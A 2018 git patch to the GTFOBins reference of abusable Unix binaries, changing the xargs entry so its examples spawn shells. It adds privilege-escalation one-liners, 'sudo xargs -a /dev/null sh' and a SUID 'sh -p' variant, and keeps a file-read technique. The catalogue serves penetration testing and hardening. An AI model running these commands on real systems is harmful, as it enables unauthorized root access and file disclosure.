From ab62d024b146f0b6aefb67152874223cb8b0164e Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Thu, 6 Sep 2018 22:32:14 +0200 Subject: [PATCH] Make xargs execute-interactive --- _gtfobins/xargs.md | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/_gtfobins/xargs.md b/_gtfobins/xargs.md index 5a15f74..42ec684 100644 --- a/_gtfobins/xargs.md +++ b/_gtfobins/xargs.md @@ -1,14 +1,17 @@ --- functions: - execute-non-interactive: - - code: xargs -a /dev/null /usr/bin/id + execute-interactive: + - description: GNU version only. + code: xargs -a /dev/null sh file-read: - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only. code: | LFILE=file_to_read xargs -a "$LFILE" -0 suid-enabled: - - code: ./xargs -a /dev/null /usr/bin/id + - description: GNU version only. + code: ./xargs -a /dev/null sh -p sudo-enabled: - - code: sudo xargs -a /dev/null /usr/bin/id + - description: GNU version only. + code: sudo xargs -a /dev/null sh ---